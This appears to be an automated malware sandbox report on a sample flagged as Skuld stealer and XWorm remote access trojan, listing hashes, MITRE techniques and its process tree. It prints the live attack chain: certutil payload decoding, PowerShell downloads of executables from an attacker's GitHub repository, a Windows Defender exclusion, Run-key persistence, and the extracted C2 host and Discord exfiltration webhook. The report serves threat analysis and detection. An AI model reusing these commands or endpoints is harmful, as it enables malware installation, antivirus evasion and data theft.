skuld | 32b65dced2e32938c9c9d18645551e734be7020f8653216a7feb9bda96c8183d

Analysis

max time kernel
104s
max time network
143s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
23/03/2025, 09:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2025-03-23_ac4696c68595e11432cf374558408150_frostygoop_ghostlocker_knight_luca-stealer.exe
Size

2.7MB
MD5

ac4696c68595e11432cf374558408150
SHA1

d56227662f3f216af3606203e9c9f3001db324b2
SHA256

32b65dced2e32938c9c9d18645551e734be7020f8653216a7feb9bda96c8183d
SHA512

2a0b937312afe3f7628f0e852c143dfec1e5bb288e59cafd071d647554169c5663f50e5ba0b478ebf63d14e8950f816e225fcb9648a7ce692fa3c5e5df901763
SSDEEP

24576:VSpnhgp7a9sHiaw0VpDxnHTmFqiPPHFf5vdL+G9pEmbzSQo9dM46JYTcj0MOBEtp:VSxmpxiaZVpNHTCN5pN6r4LEEJxfX

Score

10^/10

skuld xworm defense_evasion execution persistence rat stealer trojan

Malware Config

Extracted

Family

xworm

VisoXC-36626.portmap.host:36626

Attributes

Install_directory
%Userprofile%
install_file
driverhost32.exe

Extracted

Family

skuld

https://discord.com/api/webhooks/1352806168874975373/eWuKxj2jFgJzzBMgiQh_MevMVIGSkas35TGNtUfUToss1j_GT61e1A6mWAWeAq8Dp80s

Signatures

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral2/files/0x0008000000024307-115.dat	family_xworm
behavioral2/memory/5340-118-0x0000000000E90000-0x0000000000EAC000-memory.dmp	family_xworm

Skuld family
skuld
Skuld stealer
An info stealer written in Go lang.
stealer skuld
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 6 IoCs

flow	pid	Process
12	1828	powershell.exe
20	1828	powershell.exe
30	2796	powershell.exe
32	2796	powershell.exe
33	3988	powershell.exe
34	3988	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
1828	powershell.exe
2796	powershell.exe
3988	powershell.exe
4668	powershell.exe
864	powershell.exe
3604	powershell.exe
2136	powershell.exe
4684	powershell.exe

Downloads MZ/PE file 1 IoCs

flow	pid	Process
20	1828	powershell.exe

Executes dropped EXE 4 IoCs

pid	Process
2340	Rar.exe
5340	DriverHost.exe
1132	Rar.exe
3824	EpicGames.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	EpicGames.exe

Deobfuscate/Decode Files or Information 1 TTPs 1 IoCs

Payload decoded via CertUtil.

defense_evasion

Deobfuscate/Decode Files or Information

T1140

pid	Process
704	certutil.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
19	raw.githubusercontent.com
20	raw.githubusercontent.com
32	raw.githubusercontent.com
34	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
35	ip-api.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
2376	timeout.exe
2284	timeout.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
2136	powershell.exe
2136	powershell.exe
4684	powershell.exe
4684	powershell.exe
1828	powershell.exe
1828	powershell.exe
3604	powershell.exe
3604	powershell.exe
2796	powershell.exe
2796	powershell.exe
4668	powershell.exe
4668	powershell.exe
3988	powershell.exe
3988	powershell.exe
864	powershell.exe
864	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	2136	powershell.exe
Token: SeDebugPrivilege	4684	powershell.exe
Token: SeDebugPrivilege	1828	powershell.exe
Token: SeDebugPrivilege	3604	powershell.exe
Token: SeDebugPrivilege	2796	powershell.exe
Token: SeDebugPrivilege	4668	powershell.exe
Token: SeDebugPrivilege	5340	DriverHost.exe
Token: SeDebugPrivilege	3988	powershell.exe
Token: SeDebugPrivilege	864	powershell.exe
Token: SeDebugPrivilege	3824	EpicGames.exe

Suspicious use of WriteProcessMemory 48 IoCs

description	pid	Process	procid_target
PID 5296 wrote to memory of 4568	5296	2025-03-23_ac4696c68595e11432cf374558408150_frostygoop_ghostlocker_knight_luca-stealer.exe	86
PID 5296 wrote to memory of 4568	5296	2025-03-23_ac4696c68595e11432cf374558408150_frostygoop_ghostlocker_knight_luca-stealer.exe	86
PID 4568 wrote to memory of 704	4568	cmd.exe	88
PID 4568 wrote to memory of 704	4568	cmd.exe	88
PID 4568 wrote to memory of 2136	4568	cmd.exe	89
PID 4568 wrote to memory of 2136	4568	cmd.exe	89
PID 2136 wrote to memory of 724	2136	powershell.exe	91
PID 2136 wrote to memory of 724	2136	powershell.exe	91
PID 724 wrote to memory of 4604	724	cmd.exe	93
PID 724 wrote to memory of 4604	724	cmd.exe	93
PID 4604 wrote to memory of 4592	4604	net.exe	94
PID 4604 wrote to memory of 4592	4604	net.exe	94
PID 724 wrote to memory of 4616	724	cmd.exe	95
PID 724 wrote to memory of 4616	724	cmd.exe	95
PID 724 wrote to memory of 4684	724	cmd.exe	96
PID 724 wrote to memory of 4684	724	cmd.exe	96
PID 4684 wrote to memory of 4516	4684	powershell.exe	97
PID 4684 wrote to memory of 4516	4684	powershell.exe	97
PID 4516 wrote to memory of 1552	4516	cmd.exe	99
PID 4516 wrote to memory of 1552	4516	cmd.exe	99
PID 1552 wrote to memory of 1556	1552	net.exe	100
PID 1552 wrote to memory of 1556	1552	net.exe	100
PID 4516 wrote to memory of 1828	4516	cmd.exe	101
PID 4516 wrote to memory of 1828	4516	cmd.exe	101
PID 4516 wrote to memory of 3604	4516	cmd.exe	106
PID 4516 wrote to memory of 3604	4516	cmd.exe	106
PID 4516 wrote to memory of 2796	4516	cmd.exe	107
PID 4516 wrote to memory of 2796	4516	cmd.exe	107
PID 4516 wrote to memory of 2376	4516	cmd.exe	110
PID 4516 wrote to memory of 2376	4516	cmd.exe	110
PID 4516 wrote to memory of 2340	4516	cmd.exe	111
PID 4516 wrote to memory of 2340	4516	cmd.exe	111
PID 4516 wrote to memory of 4668	4516	cmd.exe	112
PID 4516 wrote to memory of 4668	4516	cmd.exe	112
PID 4668 wrote to memory of 5340	4668	powershell.exe	113
PID 4668 wrote to memory of 5340	4668	powershell.exe	113
PID 4516 wrote to memory of 3988	4516	cmd.exe	114
PID 4516 wrote to memory of 3988	4516	cmd.exe	114
PID 4516 wrote to memory of 2284	4516	cmd.exe	120
PID 4516 wrote to memory of 2284	4516	cmd.exe	120
PID 4516 wrote to memory of 1132	4516	cmd.exe	121
PID 4516 wrote to memory of 1132	4516	cmd.exe	121
PID 4516 wrote to memory of 864	4516	cmd.exe	122
PID 4516 wrote to memory of 864	4516	cmd.exe	122
PID 864 wrote to memory of 3824	864	powershell.exe	124
PID 864 wrote to memory of 3824	864	powershell.exe	124
PID 3824 wrote to memory of 4296	3824	EpicGames.exe	125
PID 3824 wrote to memory of 4296	3824	EpicGames.exe	125

Views/modifies file attributes 1 TTPs 3 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4616	attrib.exe
4296	attrib.exe
5632	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2025-03-23_ac4696c68595e11432cf374558408150_frostygoop_ghostlocker_knight_luca-stealer.exe
"C:\Users\Admin\AppData\Local\Temp\2025-03-23_ac4696c68595e11432cf374558408150_frostygoop_ghostlocker_knight_luca-stealer.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:5296
- C:\Windows\system32\cmd.exe
  cmd /C C:\Users\Admin\AppData\Local\Temp\batch_run_1308937010\temp.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4568
- - C:\Windows\system32\certutil.exe
    certutil -decode "C:\Users\Admin\AppData\Local\Temp\16680_2099012442.tmp" "C:\Users\Admin\AppData\Local\Temp\27607_219199147\EpicGames.cmd"
    3⤵
    - Deobfuscate/Decode Files or Information
    PID:704
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Start-Process '"C:\Users\Admin\AppData\Local\Temp\27607_219199147\EpicGames.cmd"' -WindowStyle Hidden"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2136
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\27607_219199147\EpicGames.cmd" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:724
    - - C:\Windows\system32\net.exe
        
        net session
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:4604
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        6⤵
        
        PID:4592
    - - C:\Windows\system32\attrib.exe
        
        attrib +h "C:\Users\Admin\EpicGames"
        5⤵
        Views/modifies file attributes
        
        PID:4616
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process '"C:\Users\Admin\EpicGames\sex.bat"' -WindowStyle Hidden -Verb RunAs"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Modifies registry class
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4684
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\EpicGames\sex.bat"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:4516
        
        C:\Windows\system32\net.exe
        
        net session
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1552
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 session
        8⤵
        
        PID:1556
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "& {Invoke-WebRequest -Uri 'https://github.com/VisoXC/MisterBombastic/raw/main/don/Rar.exe' -OutFile '"C:\Users\Admin\EpicGames\Rar.exe"'}"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath "C:\Users\Admin"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3604
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Invoke-WebRequest -Uri 'https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/DriverHost.rar' -OutFile '"C:\Users\Admin\EpicGames\tmp.rar"'"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2796
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        7⤵
        Delays execution with timeout.exe
        
        PID:2376
        
        C:\Users\Admin\EpicGames\Rar.exe
        
        "C:\Users\Admin\EpicGames\Rar" x -pANConTOP "C:\Users\Admin\EpicGames\tmp.rar" "C:\Users\Admin\EpicGames"
        7⤵
        Executes dropped EXE
        
        PID:2340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process '"C:\Users\Admin\EpicGames\DriverHost.exe"' -Verb RunAs"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4668
        
        C:\Users\Admin\EpicGames\DriverHost.exe
        
        "C:\Users\Admin\EpicGames\DriverHost.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        
        PID:5340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "& {Invoke-WebRequest -Uri 'https://github.com/VisoXC/MisterBombastic/raw/refs/heads/main/don/Pyroware.rar' -OutFile '"C:\Users\Admin\EpicGames\tmp.rar"'}"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3988
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1 /nobreak
        7⤵
        Delays execution with timeout.exe
        
        PID:2284
        
        C:\Users\Admin\EpicGames\Rar.exe
        
        "C:\Users\Admin\EpicGames\Rar" x -pPyroANC "C:\Users\Admin\EpicGames\tmp.rar" "C:\Users\Admin\EpicGames"
        7⤵
        Executes dropped EXE
        
        PID:1132
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Start-Process '"C:\Users\Admin\EpicGames\EpicGames.exe"' -Verb RunAs"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:864
        
        C:\Users\Admin\EpicGames\EpicGames.exe
        
        "C:\Users\Admin\EpicGames\EpicGames.exe"
        8⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3824
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\EpicGames\EpicGames.exe
        9⤵
        Views/modifies file attributes
        
        PID:4296
        
        C:\Windows\system32\attrib.exe
        
        attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
        9⤵
        Views/modifies file attributes
        
        PID:5632

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Deobfuscate/Decode Files or Information

T1140

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
57b970cd3316c4328d0d3ee8ce837822

SHA1
c364cbb0df3d1c7c7f81438a42b99f0054e92f35

SHA256
7de0151a7bba915f8af09f2cdb2f42d56afdf85763ee04d3002cc5dce66fbec0

SHA512
ea53911cd60748268cef76f5e0c74cc8e2ca06a54b1176b7507ae195206fc8c46b34b475a438ca0e01a21d8aaf8b80553a10aa5175500f949c7f338080334092

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
23c0d19c089b8489ca33ba4962db6d9f

SHA1
fca4bccffd69c5fd1427b8a92902fc6a32f2e592

SHA256
956128a716f4cdde5d432ee1be1b02ac8e93399b576dad4cddac3e8f858ea497

SHA512
3a4d3a3733e77eb3c52872c0996feb17bcd6c9e9b975f58f9502dd34ef73b6a0dafe69e058497ca7441e94526fa84829f3b6d5e5cdc2d6b0fae1583f959f40e5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
c740b54eebce0cc210f9f75235f3ac04

SHA1
0331994eab7903047c250848df530a28afd512e4

SHA256
66a44c802d5a0bb41d1521fedc7bd72cbe48e8c89a8ca53b3e0bd5a2d0fd001b

SHA512
b348de2bdddfe7790bb8c48703f81962631a6f7016a238d4abcbd5f790ac41a952ca23b3fb3d9965016fe2d24c379009c671512b5334c0e66609bb4c2f169478

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1dffbab5ecc6d06e8b259ad505a0dc2a

SHA1
0938ec61e4af55d7ee9d12708fdc55c72ccb090c

SHA256
a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

SHA512
93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
0dfc87d52784026f73d57192cb575195

SHA1
720cfc0cff7f21a4ab235f5b3a16beb28ea6d9fd

SHA256
bfd4b6a533b4e3a2a884e6f1445f646a3d83a41f6e4060964279c9b4c87a5ef2

SHA512
c6c98a666ff7880bdeaae69e200ee93fe0d6e0bfd4046bd184cf5d8209fd18439f9bfb8e3e8b5e75656c3c0deaf2dea2843061df1c2a98310dd5405cb7458604

Download Submit
C:\Users\Admin\AppData\Local\Temp\16680_2099012442.tmp

Filesize
1KB

MD5
02796cad563219bf7e6afcb89ecad5e1

SHA1
a5acd49b83032a4a12146c75cb4c7676f407e0dc

SHA256
0b900db4faf61bd99a79b12d9001c18fc24f94665c30e961dc96c3c96b4a901c

SHA512
1dd6da840c38f5f237a0c8d89e5a8a4ffd108dbc7ecead7f470ba4cfe6c3a94bd77d773f6c0e5aa55a82ab05b454396d50572f039774f38e94a92b4c7d52c081

Download Submit
C:\Users\Admin\AppData\Local\Temp\16680_2099012442.tmp

Filesize
1KB

MD5
cd3684bc66f4badb3b6b8e65b8f5cd49

SHA1
eebba3227c861bf919f2707e2ab0c154ee11b673

SHA256
5b87d4ecb1fb86e7085bf9baa840205eb2c62f032beccf2c7c69efae43fd2b4b

SHA512
002c770de7a0696aaf4ab16692f83044547c97757f2ddecae7474413d9ec1838f243d4d143fd0933a8cd26c93b6221b3013e1324926012f437d0939fe350ec89

Download Submit
C:\Users\Admin\AppData\Local\Temp\16680_2099012442.tmp

Filesize
680B

MD5
e74ce28264b7ba9b5ba080878244d80c

SHA1
8d31bb5e925dbaf772bd2b4b7e6469973a0ac096

SHA256
74019d236a44221e8f5f3e3a0596ad112330818e476ff56f948d876b55792da8

SHA512
1059449da9aa6da06a9529d3c0b7267dee38b6ae8bd0e2f87f5095ca76db671640c242bf268422d16c6e5779e49a305c0ea519b9e6d8b3308921d7c410de95b7

Download Submit
C:\Users\Admin\AppData\Local\Temp\27607_219199147\EpicGames.cmd

Filesize
1KB

MD5
b17b67954ecf60d39940d464e4f268b3

SHA1
ce8ad435880137e3089bcce9dfc8cf3314c9390b

SHA256
adfc143c862d42ee4326937497f5242bb5c3be6133e651da3f5fe567f0931f4f

SHA512
015293a7fa46ae942b730c7f19f362d8a2f7ba686511ac9cf2d779b6e9f30935b725d7a5f640f25cf92b56be2752883f0a106e3e01b6baef389630f5578e62e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rfwrkfoz.hxc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\batch_run_1308937010\temp.bat

Filesize
7KB

MD5
e7ae2941f0b19cee9702089bf44527a6

SHA1
2bfc435ec3a8f17e018a772ded4bf6441353258f

SHA256
5e57ff04ced1ad73f48d254e03d4e6d043f18932d0bda4a735549d2dce73c9cd

SHA512
1381517eb17c83489e473cb2d3a7518cb7347bdd1b61329ba49ca39e15f6b3a647c8f3ea291025009baf75743a1955e471e3447694d1665a4a19c8c67eb1eb6d

Download Submit
C:\Users\Admin\EpicGames\DriverHost.exe

Filesize
86KB

MD5
bd8e315d30eae0d40d9a6788266f646f

SHA1
a433785f26e07089c61ab7590859d7d3fef8675a

SHA256
4f26690c4de2e76303f8d9b1b09d0295f5a7cfc5665976d039301fd893a9c06b

SHA512
4085634a59a3e0956143859efe5c1713a3fce8c6dc47fb7131ac3572a27518d4290d61b4eb77b9c35a2ad68d0ce0fb066f3082e410c93374903a1f252f6eeb9a

Download Submit
C:\Users\Admin\EpicGames\EpicGames.exe

Filesize
10.3MB

MD5
fb65110ae521a76f6e0b194fb1c37552

SHA1
401f74274eca8b8ef6de600e28dadca7a06bc291

SHA256
8afc25234604022751ae980bf565f1502c220c62d945c34942631d50168248c3

SHA512
1fb9f329190e00ffa387f49721ceb3f7f1162273296b6c6385ff1c2a1a7c456757122ae0c207500fc1fd710b08e97639ec5e44359e227260ca34fee1c2a0d97e

Download Submit
C:\Users\Admin\EpicGames\Rar.exe

Filesize
744KB

MD5
16659ae52ce03889ad19db1f5710c6aa

SHA1
66b814fe3be64229e2cc19f0a4460e123ba74971

SHA256
0b1866b627d8078d296e7d39583c9f856117be79c1d226b8c9378fe075369118

SHA512
f9dd360c3a230131c08c4d5f838457f690ed4094ec166acd9f141b7603f649cfa71a47ea80e9ff41b8296246bdc1c72a75288f9a836c18431e06c2e8e3fc8398

Download Submit
C:\Users\Admin\EpicGames\tmp.rar

Filesize
51KB

MD5
2db2c682ef7f12a9420bd9be93b8984e

SHA1
dee9544e1fde40eebe189d36cd9d9baa3766d738

SHA256
f5be8dd2215ee3877fd84700fca004419d8da1981818d97e58e96b0313bd4342

SHA512
8956b5386e242fd61d9000915b1133d1a07b189fe3b4d96ddb0bd844a521779c67d6145346314c1a639df192893fc25f2afa8f8befa2544ba5cab3f1acb59765

Download Submit
C:\Users\Admin\EpicGames\tmp.rar

Filesize
3.6MB

MD5
1b42b44053a30ebd11af0ea53bddd752

SHA1
bb70e2719224b0009081cc95caf3a5eae4bdfe4d

SHA256
f3256e934152af77b6b2316fc9258ed7b868923e0f4567395a07c1a7c208d87b

SHA512
4ffb024f857c99e2a6ab8c70986dd7adc0e854b4ef89b76638dcc4cf10e8bb6b6bb85f8e9c62d82961a54163170ac9646fc84398ce1f3618b5daff2a7a39ce1d

Download Submit
memory/2136-45-0x00007FFB5A720000-0x00007FFB5B1E1000-memory.dmp

Filesize
10.8MB

Download
memory/2136-39-0x000001FC707B0000-0x000001FC707D2000-memory.dmp

Filesize
136KB

Download
memory/2136-44-0x00007FFB5A720000-0x00007FFB5B1E1000-memory.dmp

Filesize
10.8MB

Download
memory/2136-49-0x00007FFB5A720000-0x00007FFB5B1E1000-memory.dmp

Filesize
10.8MB

Download
memory/2136-33-0x00007FFB5A723000-0x00007FFB5A725000-memory.dmp

Filesize
8KB

Download
memory/5340-118-0x0000000000E90000-0x0000000000EAC000-memory.dmp

Filesize
112KB

Download